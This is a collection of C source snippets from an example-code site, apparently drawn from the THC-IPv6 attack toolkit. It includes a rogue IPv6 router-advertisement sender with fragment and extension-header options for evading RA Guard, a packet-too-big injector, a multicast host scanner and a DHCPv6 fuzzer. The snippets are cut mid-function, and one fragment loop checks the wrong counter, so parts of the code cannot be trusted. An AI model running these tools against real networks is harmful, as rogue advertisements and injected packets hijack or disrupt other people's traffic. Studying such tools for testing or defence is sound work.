    buf[i + 1] = m/8 + 1;
    i += m + 8;
  }

  frbuflen = i;

  // hop limit 255; 0xe0 is presumably the traffic class argument - confirm against thc_create_ipv6_extended
  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
    return -1;

  // optional extension headers selected with -E are added before the ICMPv6 payload
  if (do_hop) {
    type = NXT_HBH;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
      return -1;
  }
  if (do_frag) {
    type = NXT_FRAG;
    for (j = 0; i < do_frag; j++)
      if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0)
        return -1;
  }

  if (do_dst) {
    if (type == NXT_ICMP6)
      type = NXT_DST;
    if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
      return -1;
  }
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, llife, buf, i, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
    return -1;
  // pkt is reinterpreted as the library's packet header struct to reach the generated bytes below
  frhdr = (thc_ipv6_hdr *) pkt;
//printf("DEBUG: RA size is %d bytes, do_dst %d, do_overlap %d\n", i + 8, do_dst, do_overlap);

  // init pcap
  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  printf("Starting to advertise router (Press Control-C to end) ...\n");
  // to_send > 255 keeps the loop running without limit
  while (sent < to_send || to_send > 255) {
    // frhdr->pkt + 40 + myoff skips 40 bytes plus myoff of the generated packet
    // (presumably the fixed IPv6 header plus a link-layer offset - confirm)
    if (do_dst) {
      thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232);
    } else if (do_overlap) {
      if (do_overlap == 1)
        thc_send_as_overlapping_first_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
      else
        thc_send_as_overlapping_last_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
    } else {
      thc_send_pkt(interface, pkt, &pkt_len);
    }
    // hand pending captured packets to send_rs_reply before sleeping
    while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
    sent++;
    if (sent != to_send || to_send > 255)
      sleep(interval);
  }
  // reached once sent >= to_send; the remark below only holds when to_send > 255
  return 0; // never reached
}
Esempio n. 7
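/**
 * Main routine of the IPv6 host scan.
 *
 * Sends three probes to multicast6 (a plain echo request, an echo request
 * with a faulty option and an echo request with hop-by-hop data), collects
 * replies through check_packets() for about five seconds and then prints the
 * systems found via printAliveSystems().
 *
 * Exits the process when no source address, no MAC address or no capture
 * handle can be obtained. Returns 0 after the results have been printed.
 *
 * buf, alive_no, check_packets(), printAliveSystems() and the
 * sendEchoRequest*() helpers are defined elsewhere in the file.
 */
int hostScan(int rawmode,       // non-zero when raw mode is active
             char *interface,   // name of the interface to scan on
             unsigned char *multicast6, // destination (multicast group) address
             unsigned char *router6,    // router of the configured route
             unsigned char **routers) {
  unsigned char *src6 = NULL,   // IPv6 address of the scanning host
    *mac = NULL,                // MAC address obtained from thc_get_mac()
    string[64] = "ip6 and dst ";        // capture filter: IPv6 only, destination appended below
  time_t passed;                // timestamp taken when the timed wait starts
  time_t now;                   // timestamp stamped into the payload
  pcap_t *p;                    // pcap capture handle

  // look up our own IPv6 address
  src6 = thc_get_own_ipv6(interface, multicast6, PREFER_GLOBAL);
  if (src6 == NULL) {
    // everything below dereferences or formats src6
    fprintf(stderr, "ERROR: no usable IPv6 address on interface %s\n", interface);
    exit(-1);
  }

  // a MAC address is only resolved when raw mode is off
  if (rawmode == 0 && (mac = thc_get_mac(interface, src6, multicast6)) == NULL) {
    fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", thc_ipv62string(src6));
    exit(-1);
  }
  // restrict the capture to packets addressed to this host; the append is bounded by the filter buffer
  strncat((char *) string, thc_string2notation(thc_ipv62string(src6)), sizeof(string) - strlen((char *) string) - 1);

  // make the sending buffer unique
  memset(buf, 'A', sizeof(buf));        // fill the payload with 'A'
  // current time at offset 2; copied with memcpy because &buf[2] need not be aligned for time_t
  now = time(NULL);
  memcpy(&buf[2], &now, sizeof(now));
  buf[10] = getpid() % 256;     // process id, low byte ..
  buf[11] = getpid() / 256;     // .. and the next byte (truncated to 8 bits)
  memcpy(&buf[12], multicast6, 4);      // first four bytes of the destination address

  // open the capture with the filter built above
  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }
  // 1st probe: plain echo request
  sendEchoRequest(interface, multicast6, src6, router6, routers, buf, mac, NULL);

  // 2nd probe: echo request with a faulty option
  sendEchoRequestOptions(interface, multicast6, src6, router6, routers, buf, mac);

  // the first two payload bytes are rewritten before the hop-by-hop probe
  buf[0] = NXT_INVALID;
  buf[1] = 1;

  // 3rd probe: echo request with hop-by-hop data
  sendEchoRequestHopByHop(interface, multicast6, src6, router6, routers, buf, mac);

  // drain queued packets while nothing has been found yet or the target is multicast (first byte 0xff)
  while (thc_pcap_check(p, (char *) check_packets, NULL) > 0 && (alive_no == 0 || *multicast6 == 0xff));

  // keep polling for up to five more seconds under the same condition
  passed = time(NULL);
  while (passed + 5 >= time(NULL) && (alive_no == 0 || *multicast6 == 0xff))
    thc_pcap_check(p, (char *) check_packets, NULL);

  // close the capture handle
  thc_pcap_close(p);

  // report the systems that answered
  //printf("Found %d systems alive\n", alive_no);
  printf("\n");
  printAliveSystems();

  // the function is declared int, so give callers a defined value
  return 0;
}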
Esempio n. 8
/*
 * Watches IPv6 traffic on the interface and passes every captured packet to
 * send_toobig(); the loop runs for as long as the file-scope flag `go` stays
 * non-zero.
 *
 * Command line as parsed here: [-c] [-r] interface target mtu
 *   -r   raw mode (also resets offset to 0)
 *   -c   sets loop = 1 ("packets" instead of "a packet" in the banner)
 *   target may start with '*' (first or second character), which selects
 *   ip6 = NULL instead of a resolved address
 *
 * help(), offset, loop, do_hdr_size, interface, mac6, src6, mtu, ip6, go and
 * send_toobig() are defined elsewhere in the file.
 */
int main(int argc, char *argv[]) {
  char capture_filter[] = "ip6 and ! src net f000::/4 and ! dst net f000::/4";
  int raw_requested = 0;
  int opt;
  pcap_t *cap;
  char *target_arg;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  for (opt = getopt(argc, argv, "cr"); opt >= 0; opt = getopt(argc, argv, "cr")) {
    if (opt == 'r') {
      thc_ipv6_rawmode(1);
      raw_requested = 1;
      offset = 0;
    } else if (opt == 'c') {
      loop = 1;
    } else {
      fprintf(stderr, "Error: invalid option %c\n", opt);
      exit(-1);
    }
  }

  /* three positional arguments are required: interface, target, mtu */
  if (argc - optind < 3)
    help(argv[0]);

  if (do_hdr_size)
    offset = do_hdr_size;

  interface = argv[optind];
  target_arg = argv[optind + 1];

  mac6 = thc_get_own_mac(interface);
  src6 = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL);
  /* atoi(): a non-numeric mtu argument silently becomes 0 */
  mtu = atoi(argv[optind + 2]);

  if (mac6 == NULL || src6 == NULL) {
    fprintf(stderr, "Error: invalid interface or IPv6 not available: %s\n", interface);
    exit(-1);
  }

  /* a leading '*' (first or second character) means "any target" */
  if (target_arg[0] != '*' && target_arg[1] != '*') {
    ip6 = thc_resolve6(target_arg);
    if (ip6 == NULL) {
      fprintf(stderr, "Error: target address is invalid: %s\n", target_arg);
      exit(-1);
    }
  } else {
    ip6 = NULL;
  }

  cap = thc_pcap_init(interface, capture_filter);
  if (cap == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, capture_filter);
    exit(-1);
  }

  if (loop == 0)
    printf("Watching for %s from %s (Press Control-C to end) ...\n", "a packet", target_arg);
  else
    printf("Watching for %s from %s (Press Control-C to end) ...\n", "packets", target_arg);

  /* always poll at least once, then continue while go is set */
  for (;;) {
    thc_pcap_check(cap, (char *) send_toobig, NULL);
    usleep(25);
    if (!go)
      break;
  }

  thc_pcap_close(cap);
  return 0;
}
Esempio n. 9
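/*
 * Sends one DHCPv6 Solicit and one DHCPv6 Information-Request (UDP 546 ->
 * 547) to ff02::1:2 and passes captured replies to check_packets() until
 * the 3 second alarm triggers clean_exit().
 *
 * Command line as parsed here: [-n] [-N] [-1] [-r] interface [dns-name]
 *
 * help(), interface, dns_name, solicit, inforeq, _TAKE3, check_packets()
 * and clean_exit() are defined elsewhere in the file.
 */
int main(int argc, char *argv[]) {
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL;
  char wdatabuf[1024], wdatabuf2[1024];
  unsigned char *mac6 = mac, *src, *dst;
  int i, s, len, len2, pkt_len = 0, pkt2_len = 0;
  unsigned long long int count = 0;
  pcap_t *p = NULL;
  /* Both "real" switches default to 1 and the options below can only set
   * them to 1 again, so every !use_real_* branch in this block is dead. */
  int do_all = 1, use_real_mac = 1, use_real_link = 1;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

  /* 'd' is accepted by the option string but has no case, so it ends in the
   * default branch. */
  while ((i = getopt(argc, argv, "dnNr1")) >= 0) {
    switch (i) {
    case 'N':
      use_real_link = 1;        // no break
    case 'n':
      use_real_mac = 1;
      break;
    case '1':
      do_all = 0;
      break;
    case 'r':
      i = 0;
      break;                    // just to ignore -r
    default:
      fprintf(stderr, "Error: unknown option -%c\n", i);
      exit(-1);
    }
  }

  /* Options alone satisfy the argc check above; without this test
   * argv[optind] is NULL and argv[optind + 1] lies past the terminator. */
  if (optind >= argc) {
    fprintf(stderr, "Error: no interface specified\n");
    exit(-1);
  }

  memset(mac, 0, sizeof(mac));
  interface = argv[optind];
  if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  /* NULL when no name was given (argv terminator) */
  dns_name = argv[optind + 1];
  if (use_real_link)
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  else
    src = thc_resolve6("fe80::");
  if (use_real_mac)
    mac6 = thc_get_own_mac(interface);
  dst = thc_resolve6("ff02::1:2");
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  /* All three pointers are handed to the packet builders below. */
  if (src == NULL || mac6 == NULL || dst == NULL) {
    fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface);
    exit(-1);
  }

  // only to prevent our system to send icmp port unreachable messages
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }
  /* assumes both templates fit their 1024-byte buffers - TODO confirm
   * sizeof(solicit) and sizeof(inforeq) */
  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);
  len2 = sizeof(inforeq);
  memcpy(wdatabuf2, inforeq, len2);

  printf("Sending DHCPv6 Solicitate message ...\n");
  printf("Sending DHCPv6 Information Request message ...\n");
  if (!use_real_link)
    memcpy(src + 8, (char *) &count, 8);
  // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
  for (i = 0; i < 3; i++) {
    wdatabuf[i + 32] = rand() % 256;
    wdatabuf[i + 18] = rand() % 256;
    mac[i + 2] = rand() % 256;
  }
  if (!use_real_mac)
    memcpy(wdatabuf + 22, mac, 6);
  if (!use_real_mac)
    memcpy(wdatabuf2 + 18, mac, 6);
  /* count is still 0 here, so these three bytes are zero in both messages */
  memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
  memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3);

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
    return -1;
  if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
    printf("!");
  if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0)
    return -1;
  if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0)
    printf("!");
  /* The polling loop below never ends by itself; SIGALRM after three
   * seconds runs clean_exit(). */
  signal(SIGALRM, clean_exit);
  alarm(3);
//  i = thc_send_pkt(interface, pkt, &pkt_len);
  pkt = thc_destroy_packet(pkt);
  while (1) {
    usleep(75);
    while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
  }

  return 0;                     // never reached
}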
Esempio n. 10
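/*
 * Entry point of the DHCPv6 fuzzing client.
 *
 * Parses the command line, builds one DHCPv6 message from the `solicit`
 * template (optionally extended with the FQDN option), assembles the matching
 * fuzz mask in `fuzzbuf`, and then either runs fuzz_loop() on that message
 * (STATELESS) or sends it once and hands captured replies to
 * construct_from_adv_and_fuzz() (STATEFULL).
 *
 * Returns 0 when the run completes and -1 when packet construction or the
 * initial send fails. Bad options, a missing interface argument or a failed
 * address/MAC lookup end the process with exit(-1).
 *
 * do_type, fuzz_msg_type, no_send, test_start, test_end, ping, do_dns,
 * interface, dns_name, p, fuzzbuf, dns_option_hdr, dns_option_hdr_len,
 * got_packet and timeout are declared outside this function.
 */
int main(int argc, char *argv[]) {
  // 6-byte client MAC (cleared again below before it is filled in) and the packet handle.
  char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
  // Scratch buffer for the DHCPv6 payload: 1024 bytes.
  char wdatabuf[1024];
  // mac6 is handed to the packet generator; it aliases mac unless the real MAC is looked up.
  unsigned char *mac6 = (unsigned char *) mac, *src, *dst;
  int i, s, len, pkt_len = 0, dlen = 0;
  int use_real_mac = 1, use_real_link = 1;
  int state;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
    printf("WARNING: %s is not working with injection!\n", argv[0]);

  // Parse options. '9' is accepted by the option string but has no case, so it
  // ends up in the default branch.
  while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) {
    switch (i) {
    case '1':
      do_type = DO_SOL;
      break;
    case '2':
      do_type = DO_REQ;
      break;
    case '3':
      do_type = DO_CON;
      break;
    case '4':
      do_type = DO_REN;
      break;
    case '5':
      do_type = DO_REB;
      break;
    case '6':
      do_type = DO_REL;
      break;
    case '7':
      do_type = DO_DEC;
      break;
    case '8':
      do_type = DO_INF;
      break;
    case 'm':
      fuzz_msg_type = 1;
      break;
    case 'n':
      // NOTE(review): atoi() cannot report malformed input; only the range
      // check on no_send below catches a bad -n value.
      no_send = atoi(optarg);
      break;
    case 't':
      test_start = atoi(optarg);
      break;
    case 'e':
      test_end = atoi(optarg);
      break;
    case 'T':
      test_end = test_start = atoi(optarg);
      break;
    case 'F':
      use_real_link = 0;        // deliberate fall-through: -F implies -f
    case 'f':
      use_real_mac = 0;
      break;
    case 'p':
      ping = atoi(optarg);
      break;
    case 'd':
      do_dns = 1;
      break;
    case 'r':
      i = 0;
      break;                    // just to ignore -r
    default:
      fprintf(stderr, "Error: unknown option -%c\n", i);
      exit(-1);
    }
  }

  // Check options
  if (no_send < 1) {
    fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n");
    exit(-1);
  }

  if (test_end < test_start) {
    printf("don't f**k up the command line options!\n");
    exit(-1);
  }

  // The interface argument is mandatory. Without this check argv[optind] is
  // the NULL terminator and argv[optind + 1] reads past the end of argv.
  if (optind >= argc) {
    fprintf(stderr, "Error: no interface specified\n");
    exit(-1);
  }

  memset(mac, 0, sizeof(mac));
  interface = argv[optind];
  dns_name = argv[optind + 1];  // NULL when no domain name was given
  if (use_real_link) {
    // A NULL result is passed on unchanged to thc_create_ipv6_extended() below.
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  } else {
    // The low 8 bytes of this address are overwritten further down, so the
    // buffer must exist.
    if ((src = thc_resolve6("fe80::")) == NULL) {
      fprintf(stderr, "Error: could not resolve fe80::\n");
      exit(-1);
    }
  }
  if (use_real_mac) {
    // The lookup result is copied into mac right away, so reject a failed lookup here.
    if ((mac6 = thc_get_own_mac(interface)) == NULL) {
      fprintf(stderr, "Error: invalid interface %s\n", interface);
      exit(-1);
    }
    memcpy(mac, mac6, sizeof(mac));
  }
  if ((dst = thc_resolve6("ff02::1:2")) == NULL) {
    fprintf(stderr, "Error: could not resolve ff02::1:2\n");
    exit(-1);
  }
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  // only to prevent our system to send icmp port unreachable messages
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }

  // Establish state: solicit and rebind are fuzzed directly, every other type
  // first needs a server reply.
  if (do_type == DO_SOL || do_type == DO_REB)
    state = STATELESS;
  else
    state = STATEFULL;

  // generate full fuzz mask for stateless types and partial for statefull types
  // NOTE(review): fuzzbuf is filled with unbounded strcpy()/strcat(); its
  // capacity is declared outside this function, confirm it covers the longest mask.
  strcpy(fuzzbuf, fuzztype_ether);
  strcat(fuzzbuf, fuzztype_ip6);
  strcat(fuzzbuf, fuzztype_udp);
  if (fuzz_msg_type)
    strcat(fuzzbuf, fuzztype_dhcp6);
  else
    strcat(fuzzbuf, fuzztype_dhcp6no);
  if (state == STATELESS) {
    strcat(fuzzbuf, fuzztype_elapsed_time);
    strcat(fuzzbuf, fuzztype_client_identifier);
    strcat(fuzzbuf, fuzztype_IA_NA);
    if (do_dns)
      strcat(fuzzbuf, fuzztype_FQDN);
  }

  /** Generate packet **/
  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);

  // Add dns option
  if (do_dns) {
    // NOTE(review): the copies into dns_option_hdr are not bounded here; its
    // size is declared elsewhere, confirm it holds both templates plus 241 bytes.
    memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
    memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1));
    dlen = len + 8;             // offset 8 inside the copied dnsupdate1 template
    len += sizeof(dnsupdate1);
    dns_option_hdr_len += sizeof(dnsupdate1);

    // Append domain string prefix fuzz mask
    if (state == STATELESS) {
      for (i = 0; i < 7; ++i)   // 7 == length of hard coded domain prefix
        strcat(fuzzbuf, "B");
    }

    // Names of 240 bytes or more are skipped so the payload stays inside wdatabuf.
    if (dns_name != NULL && strlen(dns_name) < 240) {
      const size_t name_len = strlen(dns_name) + 1;     // includes the terminating NUL

      if (dns_name[0] != '.') {
        // Insert the separating dot and grow the two length bytes at
        // dlen - 5 and dlen - 3 by one.
        wdatabuf[len] = '.';
        wdatabuf[dlen - 5]++;
        wdatabuf[dlen - 3]++;
        len++;
      }
      memcpy(wdatabuf + len, dns_name, name_len);
      memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, name_len);
      wdatabuf[dlen - 5] += name_len;
      wdatabuf[dlen - 3] += name_len;
      len += name_len;
      dns_option_hdr_len += name_len;

      // Append variable length domain string suffix fuzz mask
      if (state == STATELESS) {
        for (i = 0; (size_t) i < name_len; ++i)
          strcat(fuzzbuf, "B");
      }
    }
    memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
    memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2));
    len += sizeof(dnsupdate2);
    dns_option_hdr_len += sizeof(dnsupdate2);

    // Append option request (FQDN request) fuzz mask
    if (state == STATELESS) {
      strcat(fuzzbuf, fuzztype_option_request);
    }
  }

  // Set message type (first payload byte): 0x01 for solicit, 0x06 for rebind
  if (state == STATELESS) {
    switch (do_type) {
    case DO_SOL:
      wdatabuf[0] = 0x01;
      break;
    case DO_REB:
      wdatabuf[0] = 0x06;
      break;
    default:
      break;
    }
  }

  // Randomise the low 8 bytes of the source IPv6 address (-F only)
  if (!use_real_link)
    for (i = 0; i < 8; i++)
      src[i + 8] = rand() % 256;

  // Randomise three bytes each at payload offsets 1, 18 and 32; offsets 22-27
  // receive the MAC after the loop. With -f the MAC itself is randomised too.
  for (i = 0; i < 3; i++) {
    wdatabuf[i + 1] = rand() % 256;
    wdatabuf[i + 18] = rand() % 256;
    wdatabuf[i + 32] = rand() % 256;
    if (!use_real_mac) {
      mac[i * 2] = rand() % 256;
      mac[i * 2 + 1] = rand() % 256;
    }
    if (do_dns)
      wdatabuf[i + dlen] = 'a' + rand() % 26;
  }
  memcpy(wdatabuf + 22, mac, 6);

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
    return -1;

  if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
    return -1;

  if (state == STATELESS) {
    // Fuzz solicit packet
    if (fuzz_loop(pkt, &pkt_len) < 0)
      return -1;
  } else if (state == STATEFULL) {
    // Fuzz request, confirm or renew packet.
    // Send a dhcp solicit to discover dhcpv6 servers
    if (thc_send_pkt(interface, pkt, &pkt_len) < 0) {
      fprintf(stderr, "Error: Failed to send initial solicit packet\n");
      return -1;
    }

    usleep(75); //<-- I don't really know why this is neccessary but it seems to be

    // Construct and fuzz packets using server identifier. The capture
    // callback sets got_packet; stop waiting once `timeout` seconds have passed.
    got_packet = 0;
    time_t start_time = time(NULL);
    while (time(NULL) - start_time < timeout) {
      while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0);
      if (got_packet)
        break;
    }
    if (!got_packet)
      fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n");
  }

  pkt = thc_destroy_packet(pkt);

  // printf("fuzzbuf: %s\n", fuzzbuf);

  return 0;
}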
Esempio n. 11
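/*
 * Probe whether anything still answers a DHCPv6 solicit on `interface`.
 *
 * Builds a solicit from the `solicit` template, drains the capture queue,
 * sends the packet and polls the capture handle until a packet arrives or
 * `timeout` seconds have passed. One resend is attempted after the first
 * second without an answer.
 *
 * p: capture handle to poll; any packet it delivers counts as a reply.
 *
 * Returns 1 if a packet was captured in time, 0 on timeout. Failure to build
 * the probe packet ends the process with exit(-1).
 *
 * `interface`, `solicit` and `timeout` are declared outside this function.
 */
int check_alive(pcap_t * p) {
  // ret: -2 = waiting, no resend yet; -1 = waiting, resend done;
  //       0 = timed out; 1 = reply seen.
  int ret = -2, len, pkt_len = 0, i;
  time_t t;
  char wdatabuf[1024];
  char *pkt = NULL;
  // NOTE(review): if thc_resolve6()/thc_get_own_mac() hand back heap memory,
  // both buffers are never released by this function - confirm ownership.
  unsigned char *dst = thc_resolve6("ff02::1:2");
  unsigned char *mac6 = thc_get_own_mac(interface);

  // mac6 is copied from unconditionally below, so a failed lookup must stop here.
  if (dst == NULL || mac6 == NULL) {
    fprintf(stderr, "Error: Failed to resolve destination or own mac for check alive packet\n");
    exit(-1);
  }

  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);
  // Randomise three bytes each at payload offsets 1, 18 and 32; offsets 22-27
  // receive the interface MAC.
  for (i = 0; i < 3; i++) {
    wdatabuf[i + 1] = rand() % 256;
    wdatabuf[i + 18] = rand() % 256;
    wdatabuf[i + 32] = rand() % 256;
  }
  memcpy(wdatabuf + 22, mac6, 6);

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 1, 0, 0, 0, 0)) == NULL) {
    fprintf(stderr, "Error: Failed to create check allive ivp6 packet header\n");
    exit(-1);
  }

  if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) {
    fprintf(stderr, "Error: Failed to create check allive udp packet header\n");
    exit(-1);
  }

  if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) {
    fprintf(stderr, "Error: Failed to create check allive packet header\n");
    exit(-1);
  }

  // debug = 1;

  // Empty packet capture queue so stale packets are not mistaken for a reply
  while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0);

  // Send initial solicit request
  try_send_pkt(interface, pkt, &pkt_len);

  // Check for response in loop and timeout if we don't get one
  t = time(NULL);
  while (ret < 0) {
    // Got reply packet; server alive!
    if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0)
      ret = 1;

    // If we still haven't received a packet after 1 second resend the solicit
    // (once only: ret leaves the -2 state afterwards)
    if (time(NULL) > t + 1 && ret == -2) {
      // Don't want to use try_send_pkt as it could take longer than timeout
      if (thc_send_pkt(interface, pkt, &pkt_len) < 0) {
        usleep(75);
        // Retry sending packet after short time if sending failed
        thc_send_pkt(interface, pkt, &pkt_len);
      }
      ret = -1;
    }

    // Give up once `timeout` seconds have passed without a reply
    if (time(NULL) > t + timeout && ret < 0)
      ret = 0;
  }
  if (ret == 0) {
    fprintf(stderr, "Timeout: Failed to receive dhcp solicitation replay in check alive function within %d seconds\n", timeout);
  }

  // debug = 0;

  thc_destroy_packet(pkt);

  return ret > 0 ? 1 : 0;
}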
Esempio n. 12
/*
 * Entry point: builds one ICMPv6 Router Advertisement and re-sends it every
 * five seconds, also answering captured router solicitations through
 * send_rs_reply().
 *
 * Positional arguments as read below: interface, IP-ADDRESS/PREFIXLENGTH,
 * then optionally dns server, link-local source address, mtu and mac address.
 * The advertisement goes to ff02::1 and carries MTU, prefix, source
 * link-layer address, three route-information options and a DNS server
 * option. Unsolicited advertisements of this kind are the traffic that
 * RA Guard (RFC 6105) filtering on access switches is designed to drop.
 *
 * Returns -1 if packet construction fails; otherwise loops until interrupted.
 * do_frag, do_hop, do_dst, do_hdr_size, myoff, type, buf3 and the fr*
 * variables are declared outside this function.
 */
int main(int argc, char *argv[]) {
  char *routerip, *interface, mac[16] = "";
  unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
  unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
  unsigned char *dst = thc_resolve6("ff02::1");
  unsigned char *dstmac = thc_get_multicast_mac(dst);
  unsigned char *dns;
  // NOTE(review): cnt has no initializer and is first used as cnt++ in the
  // fragment-header loop below.
  int size, mtu = 1500, i, j, k, cnt;
  unsigned char *pkt = NULL;
  int pkt_len = 0;
  int rawmode = 0;
  pcap_t *p;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "FHDr")) >= 0) {
    switch (i) {
    case 'r':
      thc_ipv6_rawmode(1);
      rawmode = 1;
      break;
    case 'F':
      do_frag++;                // each -F adds one more fragment header
      break;
    case 'H':
      do_hop = 1;
      break;
    case 'D':
      do_dst = 1;
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  // interface and IP-ADDRESS/PREFIXLENGTH are both mandatory
  if (argc - optind < 2)
    help(argv[0]);

  if (do_hdr_size)
    myoff = do_hdr_size;
  // publish the option buffers through the fr* variables declared outside this function
  frbuf = buf;
  frbuf2 = buf2;
  frbuf2len = sizeof(buf2);
  memset(mac, 0, sizeof(mac));
  interface = argv[optind];
  mtu = thc_get_mtu(interface);
  if (argc - optind >= 5)
    mtu = atoi(argv[optind + 4]);
  // NOTE(review): the mac argument sits at optind + 5 but is only read when
  // at least 7 positional arguments are present - confirm the intended count.
  // Each %x stores a full unsigned int starting at a single char of mac, so
  // neighbouring bytes are overwritten by the next conversion; mac is 16 bytes,
  // which keeps the stores in bounds, but the result looks byte-order
  // dependent - verify.
  if (argc - optind >= 7 && (ptr = argv[optind + 5]) != NULL)
    sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
           (unsigned int *) &mac[5]);
  else
    mac6 = thc_get_own_mac(interface);

  if (argc - optind >= 4 && argv[optind + 3] != NULL)
    ip6 = thc_resolve6(argv[optind + 3]);
  else
    ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  frip6 = ip6;
  frint = interface;
  frmac = mac6;

  // NOTE(review): the dns argument is at optind + 2 yet is only honoured when
  // four positional arguments are given; with exactly three it falls back to
  // ff02::fb - confirm this is intended.
  if (argc - optind >= 4 && argv[optind + 2] != NULL)
    dns = thc_resolve6(argv[optind + 2]);
  else
    dns = thc_resolve6("ff02::fb");

  routerip = argv[optind + 1];
  if (routerip == NULL || (ptr = index(routerip, '/')) == NULL) {
    printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
    exit(-1);
  }
  // split "address/len" in place: terminate the address, parse the length
  *ptr++ = 0;
  size = atoi(ptr);

  // resolved twice: route6 gets its host bits cleared below, routerip6 is only
  // checked for NULL in this function
  routerip6 = thc_resolve6(routerip);
  route6 = thc_resolve6(routerip);

